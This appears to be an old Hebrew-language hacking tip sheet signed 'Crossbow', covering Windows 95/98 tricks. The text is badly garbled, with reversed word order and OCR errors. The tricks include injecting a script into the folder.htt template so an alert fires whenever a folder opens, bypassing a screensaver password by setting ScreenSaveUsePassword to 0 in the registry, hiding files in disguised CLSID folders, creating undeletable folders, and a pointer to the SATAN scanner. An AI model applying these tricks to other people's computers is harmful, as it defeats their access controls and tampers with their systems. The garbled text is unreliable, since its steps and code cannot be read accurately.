...תצק םיקחשמו (ימווא שופיח םישוע .ירסי"גרה איה היינשה הייצפואה זא
...בשחמה ךלהו הנק תחא תוע (ירסי"גר םע דואמ רהזהל לבא
Crossbow
ב גאב WINDOS
תוכרעמב יתאצמש גאב דוע Windows עגרכ דבוע ינא .םש ילב !בוק תריצי םעפה (
תכרעמ לע Windows 98 תכרעמ לע םג יתחלצה לבא ( Windows 95 ןימאמ ינאו (
תואסרג לכ לע דובעיש Windows לש דאפונה תא םיחתופ ...ליחתנ ואוב (בו ...
תרבח Microsoft $ םיבתוכ ($הלעפה$ ($לחתה$ םישוע( Notepad .)רנא םיצחולו $
םש ירסח םיצבק ללכ ךרדבש םיניבמ םתאש ךכ( !בוקה ןכות תא םיבתוכ (וישכע
ויהי Plain Text .$רומש$ לע זאו ($!בוק$ לע !חלנ (ונבתכש ירחא (וישכע .)
3N+
הדוקנ( !בוקה לש תמויסה תא קר !בוקה םשב בותכנ txt םש ןיא (וארתו .)לשמל
ךותב קר אל אוה ומצע גאבה (בגא ךרד !!!!בוקל Notepad תינכות לכב אלא (
דקפב תשמתשמ םצעבש Microsoft Common Dialog !בוקב תאצמנש ( Comdlg32.ocx (
תכרעמ לש חיש וד תבית ידי לע תרמושש תינכות לכב םצעב וב שמתשהל רשפא ינעי
Windows תכרעמל אקוודש רורב הזו( Windows שי םא (בו .)!!!הזכ גאב היהי
םימויא (רבדל םכלש שארב םאאאאאאאתס וא (תויעב םכל 24 ולבקתיי הממיב תועש
(םכלש .ויקיסייאל הבבסב
Crossbow
ב תודחוימ תויקיב םיקיר WINDOS
ללכ ךרדב ןה תודחוימ תויקיתה .תודחוימ !ויקית שי (ונלוכל עודיכ (סודניוב
:האבה המישרה לשמל ומכ (הלעפהה תכרעמ לע תועיפשמה תויקית
C:\Windows
C:\Windows\System
C:\Windows\System32
3N9
C:\Program Files
איה אלה (המישרב הנורחאה הייקיתה םע דובענ ונחנא םויה Program Files םתא .
:ןאכ םישוע המ ןיבהל ידכ םיאבה םירבדה תא וכרצת
1 תפשב עדי ) Html .פירקס הווא"ג ומכ םיפירקסב םגו (
2 הלעפה תכרעמ ) Windows 98 .הלעמו
3 ךרוע םג יוצר ) Html .בו
םיליחתמ
תכרעמב שיש בינגמ שממ רבד Windows 98 נרניא ןפדפד ומכ הייונב איהש איה (
תמגודכ Internet Explorer תמגודכ םירגפמ םינצחל שי (תבותכ תרוש שי (שממ .
ובתכנש םיפד תמאב אוה (נרניא יפד ריכזמ קר אל הנבמה (וישכע .$אבה$ ןצחל
תפשב Html תפשש ןוויכמ (וישכע !!! Html דוק הל שיו לופמיק םוש תשרוד אל
($לחתה$ ירפתל ךלנ :אבה רבדה תא השענ (לכה תא םש תונשל רשפאו חותפ רוקמ
(בו .$הייקית תויורשפא$ ןייפאמל רובענ םשמו ($םינייפאמ$ לע רבכע"ת םישנ
ןמסנ זאו ()יל הארנ $הארמ$ בותכ הילעש( היינשה הייסירכה לע !חלנ וישכע
תפש לש ךרועה תא חקינ (וישכע (הבבס .$םיצבקה לכ תא גצה$ לש הייצפואה תא
Html םצעבו ()...סודניו לש תובותכ סקנפב שמתשהל לוכי ןיאש ימל לבא( ונלש
:ונלש ךרועה ךותב אבה !בוקה תא חותפל
C:\Program Files\folder.htt
תכרעמ שי יל (ךרעב( הככ הארנ !בוקה (וישכע Windows 98 תוארהל יתיצר ינא זא ()...תילגנא
דבל וארת זאתויעב השוע הז לבא רוקמ דוקה תא םכל
+!+!+םישוע המ (זא
רשפא !!!הללאל בינגמ לוצינל ךרד הפ תוארל רשי לוכי םדאנב לכ !דואמ ושפ
תכירע ידי לע לכהו (םירלא םישל (תויפוסניא תואלול םישל ומכ והשמ תושעל
!בוקה לש הכירע ידי לע תכרעמ"ת םדאנבל קסרל רשפא הרכשא !!!הרימשו !בוק
םעפה לבא (!בוקה לש תונושארה תורושה תא ןאכ תא םושרא ינא (רציקב !!!הזה
:ונפסוהש ןק יוניש םע
''!2
% This file was automatically generated by Microsoft Internet Explorer 4.0
% using the file ºTHISDIRPATHº\folder.htt (if customized) or
; % TEMPLATEDIRº\folder.htt (if not customized .)
.''
2 html .
3N3
2 link rel÷stylesheet href÷"ºTEMPLATEDIRº\webview.css"
title÷"Windows .$
2 head .
''!2 allow references to any resources you might add to the folder .''
( ''!2 a "webbot" is a special wrapper for FrontPage compatibility .'' )
''!2 webbot bot÷"HTMLMarkup" tag÷"base" startspan .''
2 base href÷"ºTHISDIRPATH .$,;
''!2 webbot bot÷"HTMLMarkup" endspan .''
2 script language÷"1avaScript .$
// the next line is the ONLY difference from folder.htt
alert ("hacker has been here 7)$!
var L_Intro_Text ÷ "<b><font
color÷red>Warning</font></b><br><br>Modifying the contents of this folder
may cause your programs to stop working correctly.<br><br>To add or remove
programs, click Start, point to Settings, click Control Panel, and then click
<b>Add/Remove Programs</b 7$..
ונמייס
הלעת (הייקיתל סנכיי והשימש םעפ לכש איה םדוקמ יתישעש המ (ןיבה אלש ימל
דיגתש העדוה וזיא Crossbow has been here הייעב ןיאש ןימאמ ינא (רציקב ...
סודניו תוכרעמב דחא גאב דוע הנה (הללאי זא .תויורשפא דוע לע ןאכ בושחל
(םכלש ...לצנל רשפאש
Crossbow
י$ע החבאב םירוח תאיצמ SATAN
םיכרדה תחאל הנושארל ופשחת םתא םויה .םכלש םייחה תא הנשיש םויה הז םויה
לע ודמלת םויה .םישמתשמ םייתימאה םירקאהה הבש Satan (ןושאר רבד . Satan הז
.החבאב םירוח תוהזל התרמש תינכות אלא (םונהגהמ הנכות הזיא אל Satan הז
Security Administrators Tool for Analyzing Networks ילכ (תירבעב וא (
תולגל ידכ תשרב םיבשחמ תקירסל תשמשמ וז הנכות .תותשר חותינל החבא ילהנמל
3N:
םיעצבמ םתואש םירבדה םתוא תא תעצבמ תאזה הנכותה .תומייוסמ הפרות תודוקנ
איה (תכרעמה לש הפרותה תדוקנ תא לצנל םוקמבש אלא (תוכרעמ חצפל ידכ םירקאה
.החבא רוחה לע תחוודמ קר Satan םילוקוורפה רובע םיתרשב םימגפ לע תחוודמ
Ftp, Finger, Nis, Nfs, Rexd הרוצת !בוק לכה ךסב אוה םגפה ללכ ךרדב .דועו
םע דחיב .גאב וא החבא רוח אוה םגפה םימעפל לבא (העורג הרוצב הנבנש Satan
םגו (לצנל ןתינש הפרותה תודוקנ יגוס לע קוידב םיריבסמש הכרדה יפד םג םיאב
(גניקאה םע םתלחתהשכש חוב ינא .םכלש הריחבה תאז הפ .ןתוא ןקתל ןתינ ךיא
.אלש (והז זא .$ךלנו ילש םירבחל םיקיר המכ הארנ זא$ םכמצעל םתבשח םכבור
וחקית זא .םכתא סופתל םילוכיש (ןכוסמו יתימא גניקאה הז .קחשמ אל רבכ הז
םילוכי םתא .תויהל םיצור םתא םירקאה הזיא לע בו בו ובשחתו (תוקד שמח
םג םתא .הרוצ"ת הל םיקפודו תכרעמל םיצרופש )םירוחש( םיקאינמ םירקאה תויהל
וא ותוא םינקתמו (תכרעמב גאב םילגמש )םינבל( םיבו םירקאה תויהל םילוכי
בו םש ןתונ הז יכ (היינשה תורשפאה לע !ילממ ינא .ןימדאל וילע םיעידומ
המ םתלחהש ירחא .ידמ רתוי ונמצעמ םיבהלתמ אל ונחנאש הארמ הז (גניקאהל
.ךישמהל םילוכי םתא (םירקאה רותב ושעת
הנכותל תורהזא
Satan תופשב התנבנ Perl 5.0 תפשו C תימושייה הנכותה תא דחא #אמ וחקית לא .
.םכמצעב ולפמקתו רוקמ דוקה תא ודירות .סוריו הב ליתשהל לוכי דחא לכ יכ
ןוישר תחת איה תינכותה Gnu לכ (לכה רוקמ דוקב תושעל םילוכי םתא (ינעי (
יבחרב תוכרעמ המכ שי .)#סכ תושעל (ינעי( רוחסימל וב םישמתשמ אל םתא דוע
לש הלעפהו םישלופ דגנ תורהזא תוללוכש תשרה Satan תא ליעפהל הלולע תשרב
.ורהזית זא (ולאה תוקעזאה
הז תא דירוהל
:איה ותבותכש (ימינונא יפיפאמ דירוהל הז בו יכה (בו
ftp.win.tue.nl/pub/security
אוה (הנכותה לש רוקמה דוקב ולכתסת :הנורחא הצע דועו (הז םע ורהזית (בו
(םכלש !!!ןומה רמוא
Crossbow
תוידוס תויקית
תא (םתדרוהש גניקאה תונוילגה לכ תא תווסהל ךיא דמלנ םויה +בצמה המ (ןלהא
הייקית ורצית .םינבצעמ םיחאו םירוהמ ריתסהל (הלא לכ תא (סקס ירסה לכ
:)פישו לורנוק( הככ הייקיתל ארקנ (וישכע .השדח
3N=
TheName.¦0003000E-0000-0000-C000-000000000046 /
םשב שדח היידמ !בוק םכל רצווי (ל$נה םשה תא ונעבקש עגרב (וישכע TheName .
ינא .םיצור םתאש רבד לכל #ילחהל םילוכי םתא םשה תא :םירבסה וישכע (בו
גוס לכ קלחמ סודניו (וישכע .תולקועמה םיירגוסה ןיב רפסמה לע רבדל הצור
יורקה (!בוק םש ותוא לש יוהיזה גת אוה הז רפסמ .ירסי"גרה ךרד רפסמל !בוק
ClassID רשפא .$היידמ$ אוה תולקועמה םיירגוסה ןיב הלעמלש רפסמה (וישכע .
:אבה םוקימב (ירסי"גרה ךותב (םינוש םיצבק יגוסל םירפסמ דוע שפחל
My Computer\HKEY_CLASSES_ROOT\CLSID
דצב זאו (רפסמה לע תחא םעפ !וחלל רשפא (אוה רפסמ לכ המ תעדל ידכ (רציקב
םינתונ םתא (הייקיתה תא חותפל ידכ (רציקב .!בוקה לש רואיתה תא בותכ לאמש
שי םהבש תומוקמ ינש שיש םיאור םתא זאו (תווסומה הייקיתה לע תינמי הציחל
.ליגר $חתפ$ שיו ()לדחמ תרירבה אוהש( שגדומ $חתפ$ שי .$חתפ$ הלימה תא
םיצבק קיבדהל םילוכי םתא .םינפב םתאו (ליגרה $חתפ$ לש תורשפאה לע וצחל
ךכ (הייקיתה ןכות לש לדוגה היהי םינייפאמב !בוקה לש לדוגה .הייקיתה ךותל
םצעבש ()!!!הייקית אוה (#ייוזמ( היידמ !בוק םואתפ םכל היהיש תויהל לוכיש
לש לדוגב היהי 300 (םכלש ...ייב הגמ
Crossbow
תלבגה תפיקע WINDOS הלקהב
(הלעפה (לחתה לע וצחלת (םיריכמ אל םתא םא +זואודניו לש ילקמה תא םיריכמ
ובתכתו SndRec32 לש ילקמה הז :וריכת זא אל םא +רכומ .רנא לע וצחל זאו
דנואס (קסיד (ןופורקימ ךרד תויהל הלוכי הלקהה .הלקה רשפאמש (זואודניו
רחאל .תוינש םישישל תלבגומ הלקהה (וישכע ...רחא ןקתה לכ וא (הצוחה אצויש
תא םיפקוע ךיא +הז תא םישוע ךיא (זא ...ילקהל קיספמ אוה (תוינש םישיש
הז ירחא (לחתה ירפת לע םיצחול (בו !!!הללאל ושפ +תאזה תממומה הנגהה
3NJ
םש ובתכת (הלעפה לע SndVol32 ומשש ירפת לע וצחלת (וישכע .רנא לע וצחלתו
תא בותכ (םכל חתפנש ןולחה לש ינשה קלחב .$םינייפאמ$ לע זאו ($תויורשפא$
וצחלת .רחאו הלקה (העמשה :תויצפוא שולש שי זאו ($רובע המצוע םאתה$ פשמה
.םכלש בשחמב הלקהה לש םינקתהה לכ תא שי (וישכע .רושיא לע זאו (הלקה לע
ןקתהה לע וצחלת Mixed Output .ןק יו ןמיס היהי $רחב$ הלימה דילש ךכ (
וצחלת .ונלש הלקה תנכותל וסנכית .ןולחה תא רוגסל רבכ םילוכי םתא וישכע
ןגנל וא (שדח ןולח #א חותפל ילב תוינש םישיש וכח זאו (הלקהה לש ןמיסה לע
הכירע ירפת לע וצחלת (ומייתסה תוינש םישישהש ירחא (וישכע .בשחמה לע והשמ
ורזח .$קבדהו #סוה$ לע זאו (הכירע יקפת לע םעפ דוע וישכע .$קתעה$ לע זאו
הנגהה תא #קועש ילכ ונל שי (אלפו אלפהו (םכל יוצרש םימעפ המכ הלועפה לע
!םיעו אל םיבובז ןוילמ ינש (ארח לכאת (סייג ליב ...זואודניו לש תרגפמה
(םכלש .ונהת (הללאי זא
Crossbow
ל תוצירפ ינמ לכ WINDOS
זואודניו שי ילש ןוויכמ (בו 98 םיגאבה תא תצק רוקחל יתלוכי זא (תיבב
(בו .תחתל הווש אוה לבא (םוינלימ זואודניו יל שי ...תאזה תכרעמב םימייקש
פוקסד ביקא לש חוב בצמ יוניש
3NN
שיו ןבל עבצל ךפוה אוה זאו (עקתנ הדובע ןחלושה םואתפש הזה עקה תא םיריכמ
תכרעמב :רצק רבסה .ותוא ךורעל תורשפא שי זא +הדובע ןחלושה רוזחישל תורשפא
זואודניו 98 המכ ךרצנ ונחנא (בו .נרניא #ד ומכ דקפתמ הדובע ןחלושה
הפ רבדמ ינא .נרניא יפד ךרוע םיכירצ ונחנא ןושאר רבד .הז ליבשב םירבד
(בו .זואודניוה לש ןבתכה קיפסמ אל (סולפ תידא ומכ (יעוצקמ ךרוע לע ןבומכ
:אבה !בוקה תא וחתפית .הזה ךרועה תא וחתפת
C:\Windows\Web\Safemode.htt
הנה (בו .תירבעב םגש תויהל לוכיו תילגנאב תויוש ינימ לכ וארת םתא וישכע
:דחא רוציקב וא (נרניא יפד תונכיתב עדי תצק :םיכירצ ונחנאש ינשה רבדה
תפשב שומיש Html בותכל םוחב !ילממ ינא .םכלש שארבש המל הז תא ותנכתת !!!
.ןונגסב והשמ וא ($םיבלכה פוסורקיימו סייג ליב$ הלודגה תרתוכהש הפיא
הריהמ !בוק תחילש
המידק .םכלש בשחמב והשלכ !בוק לע תינמי הציחל וצחלת .םינבבוחל יד הז (בו
ןק ירפת םכל חתפי .$לא חלש$ לע רבכעה םע ולעת .םולכ םכל הרקיי אל (ונ
:האבה הייקיתל תוינגלאב וסנכיתו (הזה ירפתהמ ואצת וישכע (בו .דצב
C:\Windows\Sensto
.ןגל ורזחת :רושיק תושעל םיעדוי אל םתא םא .והשפיאל רושיק ופיסות וישכע
םמומה !בוקה לע וצחלת (הייקיתהמ ואצת (רושיק םתפסוהש ירחא (וישכע (בו
אלפה הברמל (וישכע (יפוי .$לא חלש$ לש ירפתל וסנכיתו (םדוק םתצחל וילעש
.ונל אבש הפיאל חולשל תורשפאה תא ונל שי
הריהמ הלעפה
ובש (הריהמ הלעפה ארקנש והשמ שי $לחתה$ ירפת דיל .הכומנ המרל הז םג (בו
יאה ודילו ררולפסקא נרניא ודיל (הדובע ןחלושה לש למסה תא שי ללכ ךרדב
:הייקיתה ךותב היהיש רושיק ופיסות ושפ והשמ םשל #יסוהל ידכ (בו .ליימ
C:\Windows\Application Data\Microsoft\Internet Explorer\Quick Launch
...הלאכו קוחמל םג רשפא (ןבומכו
תינדי ךסמ רמושה לש יוניש
:אבה !בוקה תא וחתפת .תורדגהב והשמ תונשל ךירצ יתייהשכ יתיליג הז תא (בו
C:\Windows\System.ini
לכ לש תואמסיסה !בוק תואלפנ תא םג וליג וכרד (ללכב ליעומ דואמ הזה !בוקה
םג רשפא .אצמנ תואמסיס !בוקה הפיא הארמש הרוש וארת בו ושפחת םא .תכרעמה
זואודניו תכרעמל הצירפה יכרדמ תחא דועל הז תא ךופהלו ןויערה תא חתפל
םיבתוכ זאו (פוסורקיימ לש הריחבה ךרד (סוד סא םאל םיסנכנ :אמסיס תשקבמש
EDIT C:\Windows\System.ini
.ךסמ רמושל רוזחנ ואוב (בו .םיצורש המל !בוקה לש םוקימה תא םינשמ זאו
:ךסמ רמושב יולת (הזכ והשמ בותכש ובש םוקמ ונחתפש יניא !בוקה ךותב ושפחת
SCRNSAVE.EXE÷C:\WINDOWS\SYSTEM 8קייבוא, 1 . SCR
דואמ אוה (הזה יניא !בוקה תא רוקחל !ילממ ינא .םיצור םתאש המל ונשת ושפו
זואודניוה ךיאב םיחמומ ויהת רבכ עובש ירחאו (זואודניו לש גניקארקל בו
(םכלש .סקה רמגנ ןאכ זא (בו .דבוע
:םיסקב םיבינגמ םייוניש
םיעקה לכ תא םגרתיש (ןיאש ימל .זואודניו לש תירבע אסרג תיבב שי יל
דיגנ :אמגוד ןתינ ואוב !!!ולש הייעב :ךיא עדוי אלש ימו (תילגנאל םיבושחה
הז תילגנאב זא .לחתה לע !וחלל ךירצ Start לע וצחל (בו .יפוי +םתנבה ...
3N.
( הלעפה לע זאו (לחתה Run םש ובתכת .) regedit םכל עיפוה .רנא לע וצחלתו
קחשמל הצירפה לש הבתכל ךליש (ירסי"גר הז המ עדוי אלש ימ .ירסי"גרה ךרוע
:אבה םוקמל וכל וישכע (בו !ושייבתת +םתארק אל ...חחחחחחחפ ...לסירפ
My Computer\HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ,
CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL ,
לע תחא םעפ וצחלת (בו !!!+המ זא +המ זא +המ זא ...ךורא תצק SHOWALL ...
םיארקנ םה ךיא עדוי אל ינאש םיממומ םינמיס הלאכ םכל וחתפנ ןימי דצמ
לע םיימעפ וצחל ...תירבעב Text הייצפואל תחתמ . Value Data ...והשמ ובתכת
.יפוי ...חחחחחחחפ ...הלאה םינברוחמה םיצבקה לכ תא גצה :ובתכת ...דיגנ
הלעמל ורחבת .הייקית תויורשפאל זאו (תורדגהל וכל (לחתה לע וצחלת (וישכע
...חחחחפ ...בותכ המ וארת זאו (#וסה דע המל ודרת .הגוצת לש הייסירכה תא
הייקיתה תא תונשל רשפא ...הלאכ םירבד דוע שי NOHIDDEN הייקיתה תא וא
NOHIDORSYS לש ךרעה תא קר תונשל ... Text !!!דואמ ןכוסמ ראשה לכ !!!
:אבה םוקמל וסנכ ...םיירפת יוניש אוה בינגמ יוניש דוע
My Computer\HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ,
CurrentVersion\ExtShellViews ,
הייקיתה ךותב .יפוי ExeShellViews .תולסלוסמ םיירגוס ןיב רפסמ תויהל ךירצ
לע םיימעפ וצחל ןימי דצמ .תאזה הייקיתה לע תחא םעפ וצחל MenuName .יפוי .
...חחחחחפ !!!דימ נרניא #ד רותב הז תא גיצת :דיגנ .רחא והשמ ובתכ וישכע
ירפתה לע וצחל .ילש םיכמסמל דיגנ .וצרתש הליגר הייקית לכל וסנכת וישכע
...רחא והשמ וישכע בותכ $נרניא #דכ$ בותכ היהש םוקמב .הגוצת בותכ וילעש
:הייקיתל וסנכ ירסי"גרה ךרועב (בו ...בשחמ תורדגה אוה בינגמ יוניש דוע
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
, FS Templates\Desktop
הייקיתה לע תחא םעפ וצחל Desktop ( למסה תא ןימימ ורחב . Defult וצחלת .)
.$בינגמ בשחמ$ :דיגנ ($ינחלוש בשחמ$ םוקמב ובתכת .הזה למסה לע םיימעפ
תחא םעפ וילע וצחלת +ילש בשחמה לש למסה תא שי הדובעה ןחלושבש ןוכנ (וישכע
.רבכעה לש ינמיה קלחה לע הציחל (ירפת תציחל אלא (הליגר הציחל אל לבא
תכרעמ לע וצחלת .)הנורחאה הייסירכה( םיעוציב תייסירכ תא ורחבת וישכע
.הריחב תמישר שי $הז בשחמ לש ינייפואה דיקפתה$ בותכש הפיא (וישכע .םיצבק
הז ימ +ךלמה ימ +ךלמה ימ זא +בותכ המ Crossbow .םאאתס !!!ךלמה +אה +ימ +
םתסש וא (הזמ תאצל ךיא עדוי אלו בשחמה תא ומצעל קפד והשימ דיגנ (וישכע
אל לבא (יוביכ םישוע +םישוע המ .ונישעש םייונישה לכ תא םיבהוא אל ונחנא
בצמב יוביכ אלא (ליגר Ms-Dos ( רוחשה ךסמב ובתכת . Ms-Dos :םילימה תא )
Scanreg /restore
ישקמ תרזעב (םכלש ירסי"גרה תא ונממ רזחשל ךיראת ורחבת .רנא וצחלת זאו
...רזחושי ירסי"גרה זאו .רנא וצחלת זאו (םיציחה
:זואודניו לש הריגסה יכסמ אוה בינגמ יוניש דוע
:קירה הנה (בו +המ זא ...הז תא ריכמ םלוע יצח רבכש עדוי ינא ...ןכ (ןכ
תא וחתפ Paint Brush וצחלת ($לחתה$ ירפתל וסנכ :ךיא םיעדוי אל םתא םא .
ובתכת ($הלעפה$ לע pbrush $!בוק$ ירפתל וסנכת .יפוי .$רנא$ וצחלת זאו
3N;
:/ בותכ היהי $...ב שפח$ םילימה דילש וקדבת .$החיתפ$ 'ל זאו C זא אל םאו
:/ תא ורחבתו םש וצחלת ושפ C תייקית לע םיימעפ וצחל . Windows ובתכת זאו (
)סקה תספוקב( המל Logos.sys הז לע רייצל וסנ +םיאור םתא .$חתפ$ וצחלתו
.$!בוק$ ירפתב $רומש$ לע וצחל !!!הנומתה לדוג תא תונשל אל לבא (והשמ
םעפה ובתכתש הזמ !וח (רבד ותוא ושעת וישכעו Logow.sys אלו Logos.sys םג .
בשחמה תא ובכתש האבה םעפב !יפוי .רומשל !!!הנומתה לדוג תא תונשל אל הפ
התשע (םלועב הנימאה הרבחה (פוסורקיימ +ונישע המ (ושיכע .םתרייצש המ הלעי
םע םיצבק ינשב זואודניו תריגס לש םירויצה ינש תא הרמש איה (םכח דואמ רבד
תמויס sys לש תמויס יכ (!בוקה תא חותפל אל שמתשמה תא עירתהל האב תמויסה .
sys ( תכרעמ !בוק תרמוא System +תכרעמ יצבק םע קסעתהל לבהא קיפסמ ימו ()
(דימת םכלש (זואודניו לש שדחה ןונגיסהמ ונהת !!!ןבומכ ונחנא
Crossbow
ךסמ רמושה לש המסיסה תצירפ
םימכח םהש םיבשוח ריכמ ינאש םילבמ םידלי ןומה לבא (םכתיא המ עדוי אל ינא
רמושה תא ליעפהל יל םירמוא םהו (המל םתוא לאוש ינא זא ...םיבשחמב ךכ לכ
האנשב שדקומ הזה ךירדמה זא ...אמסיס ומש םילבמהש רבתסמ .ונממ תאצלו ךסמ
...אמסיס םימש םה יכ םימכח םהש םיבשוחש םינק םידלילו ןוזנשיפל הבר
3.*
+םישוע המ
...ךסמ רמושה לש תורדגהל וסנכת זא +אל (אמסיס ךירצ אמסיס !ורפל ידכ (בו
.ךסמ רמוש תייסירכלו (הגוצתל םשמ (הרקבה חול הז זא (םיעדוי אל םתא םא
בותכש הזה רבדה דיל תאצמנש הביתה לע יו היהיש הככ תחא םעפ וצחלת .ןייוצמ
...םכלש שארבש המ ...אמסיס וסינכת וישכע (בו ...$אמסיס תועצמאב ןגומ$ וב
.אמסיס סינכהל וכרצת םתא (רבכעה תא וזיזתו ךסמ רמושל וליעפת םא .יפוי
(בו .סיר תושעל ךרצנ יכ (דיב תספדומ תאזה הבתכה תא ונל שיש דיגנ (בו
...תינדי סיר ההשענ ונחנא (ונממ תאצל אמסיס ונתיאמ שקיב ךסמ רמושהש ירחא
זואודניוש ירחא (בו .סיר השעיש בשחמה לש אספוקב רותפכה לע וצחל (ינעי
זאו הלעפהל זאו (לחתהל וסנכת (ינעי ...ירסי"גרה ךרוע תא וחתפת (ונל הלע
םש ובתכת regedit םיעדוי םתא םימדוק םיסק םתארק םא (וישכע .רנא וצחלתו
ארקיש וא (!צופתיש זא עדוי אלש ימ .ירסי"גרה ךרוע תא ליעפהלו ולשל ךיא
:הייקיתל וסנכת ירסי"גרה ךרועב (בו ...הזה רתאב תורחא תובתכב
HKEY_CURRENT_USER\Control Panel\Desktop
לע וצחלתו Desktop ודילש לוחכ ןמיס שי ןימי דצמ (וישכע !!!דבלב תחא םעפ
בותכ ScreenSaveUsePassword ךרעה ינעי (דחא (ילמידסקה אוה ולש ךרעהו ...
תויהל ךירצ 00000001 ומכ שממ .אל וא תלעפומ אמסיסה םא עבוק הז (וישכע .
:תיראניבה הפשב 0 יהמ אוצמל ךירצ אל +םישוע המ זא .לעופ הז דחא (הבוכמ הז
תוריהמבו םיימעפ םיצחול זא ...תובכל קר ךירצ (םולכ קוחמל ךירצ אל (אמסיסה
לע ScreenSaveUsePassword רפסמה תא תוינגלאב םש םיבתוכו 0 !!!ספא !ספא .
.ונלש ךרועהמ םיאצוי (בו ...חחחחח !!!ספא ינא !!!יצרא ןב ינא !!!ספא ינא
!!!הח הח הח !!!אמסיס שקבמ ותוא הארנו (ךסמ רמושה תא שדחמ םיחתופ
(םכלש!!!ךסמ רמוש תמסיס םימשש םילבמה לע וקחצת זא
Crossbow
קוחמל רשפא יאש תויקת
תכרעמ לע יל דבע .יתאצמש דומח גאב Microsoft Windows 95 לע #סונב םגו
תסרגב תכרעמ Microsoft Windows 98 (הייקית ורצית :ייקסא אוה ןויערה ...
ייקסאל הלש םשה תא ונשת 0169 זא (ךיא םיעדוי אל םתא םא (רציקב .D :ינעי
3.+
לע םיצחול Alt תדלקמה לש ןימי דצב םירפסמה תא שי זאו (!וחל ותוא םיריאשמ (
םג םיארקנו עובירב םירדוסמש Numpad שש לע (דחא לע (ספא לע םיצחול רציקב (
שקמ תא םיריאשמ לבא( עשת לע #וסבלו Alt תכרעמב תולתכ (וישכע .)!!!!וחל
הייקית$ םשב םואתפ ארקית םכלש הייקיתה (שדחה םשה תא ורשאתש עגרב (םכלש
$ תילגנא תכרעמ םכל שי םא וא $השדח New Folder (הילא סנכהל וסנת םא זא .$
רשפא יא ןבומכ םגו .תמייק אל הייקיתהש תרמואש םיצבק תכרעמ תאיגש םכל הלעת
ךרדה ...ןאכ #יסוהל המ הברה ןיא (בו .דועית הילע םייק אלו (הילע קוחמל
ייקסא לש םשב ארקית אל הייקיתה .סוד סא םא ךרד איה התוא קוחמל הדיחיה
רפסמ 0169 תואב אלא ( C ייקסא ירפסמ םע תושעל רשפא רבד ותוא (בגא ךרד .
רפסמ לשמל .םירחא םימייוסמ 0174 תואב גצוימש R הברה לבא (שממש גאב דוע .
ומכ( הייקית לש יקוח םשב סודב םיגצוימ אלש ייקסא ירפסמ אוה ןכוסמ רתוי
לש ייקסא רפסמ םע הייקית רוציל וסנת םא לשמל 0164 סא םא תכרעמב גצוימש (
תגצוימש הייקיתל עיגהל יתחלצה וליפאו (תועמשמ הל ןיאש תיבכוכ רותב סוד
םא (רציקב .)תכרעמ לכב יקוח וניאש םשל ללכב תובשחנש (תואכרמ רותב סודב
תויעב לע רבגתהל רשפא (קוחמל םיחילצמ אל םתאש הייקית םע םתעקתנ הרקמב םתא
תנכות תועצמאב הלאכ ScanDisk הייקיתה םא (ינעי (דבלב סוד סא םא ךותב לבא
ןנוכב תאצמנ C וחתפת זא ()יפוסה אלמה םוקימה הנשמ אל (ןנוכה תוא קר הנשמ(
תכרעמ רשאכ( סוד סא םא תכרעמ תא Windows הדוקפה תרושב ובתכתו ()תלעופ אל
םילימה תא סוד סא םא לש Scandisk c דיגהל הצור ינאש רבד דוע .רנא וצחלתו
לש תוכרעמב םימייוסמ ייקסא ירפסמש אוה הזל רבסהה .הרוק רבדה ךיא םצעב הז
ומכ( הרוש תדוקפ Ms Dos וא Linux Terminal םיילנידרוא םיכרע םתואמ םינוש )
ומכ( תויפרג תוכרעמב Windows וא Linux Window X Gui תא ובתכת םא (רציקב .)
רפסמה לש ייקסאה ךרע 0164 ובתכת םא לבא (רלוד לש ןמיס םכל גצוי סודניוב
רפסמ ייקסא( ילנידרוא ךרע ותוא תא 0164 סא םא ומכ( הדוקפ תרוש תכרעמ תחת )
תילגנאה תואה תא םכל גצוי ()סוד n לצנל רשפא (וישכע ...הילעמ ליעגמ וק םע
תחת ךרע הווש אל ייקסא רפסמ םע הייקית רוציל :תוכרעמ ןיב הזה ינושה תא
רוציל (ךפהל וא (סודניוב םיצבק תכרעמ תאיגש רוציל ךכ ידי לעו סוד תכרעמ
לעו (סודניו תחת תוכרעמה ןיב ילנידרוא ךרע הווש אל ייקסא ךרע םע הייקית
םתא תויעב דוע םכל שי םא .סוד סא םא תכרעמב הייקית התוא תא םוסחל ךכ ידי
(הייעבה תא רותפל חיבמ אל ינא לבא (ויקיסייאב יתוא סופתל תוסנל םילוכי
.םתנהנש הווקמ ינא (בו !שמתשמה תוירחא לע ולוכ אוה הזה סקב שומיש יכ
(#יכב םכלש
Crossbow
םישקומ הלושל הצירפ
םימעפל שיש איה הדיחיה הייעבה .הלק דואמ הזה קחשמל הצירפהש איה תמאה (בו
לכב םייק היהי אל םינותנה םירמשנ ובש !בוקה ןכלו (תואסרג ןיב םואית יא
תכרעמ לש אסרג Windows !בוקה תא וחתפת (בו . C:\Windows\Winmine.ini םע
3.9
תכרעמ תחת הז( סק ךרוע Windows ךרועב שמתשהל וצרתש הארנכ ( Notepad .)
תייגולונכ תאז (וישכע (ייקוא ini תמויס םע םיצבק לש ןויערה . ini אוה
(וישכע .םישקומה הלושב םיאישה תלב תא (לשמל .םירמרפ ךותב עדימ רומשל
!בוק לכ תליחתב ini .!בוקה לש הזה קלחה לש דיקפתה תא תנייצמש הרוש הנשי
תליחתב (אמגודל Winmine.ini 5 הלימה תא ונל שי Minesweeper ונל שיו הדימב &
.תירבע אסרג םע תכרעמ ונל שיו הדימב &םישקומה הלוש5 וא (תילגנא תכרעמ
תא ןייצמש רמרפה .ולש ךרעה וירחאו (רמרפה םש תא ןייצת הרוש לכ (תחתמ
אוה הלק המרב #ולאה לש םשה Name1 המרב #ולאה לש םשה תא ןייצמש רמרפה (
אוה תינוניב Name2 אוה השקה המרב #ולאה לש םשה תא ןייצמש רמרפהו Name3 .
יל בותכ היהש דיגנ (וישכע Name1÷Yosi תא םש בותכ היהיש הצור ינא לבא (
בותכנו הרושה תא הנשנ זא ...ילש םשה Name1÷Crossbow .לק המכ (ושפ המכ ...
םתאש ישוקה תמרל םאתהב הלעמל יתנייצ רבכש םירמרפהמ דחא לכ תונשל רשפא
רמרפה .םכלש אישה ןמזל רובענ וישכע (בו .םיאישה תלבב עיפוהל םיצור
Time1 רמרפה (הלקה המרה לש אישה ןמז תא ןייצמ Time2 אישה ןמז תא ןייצמ
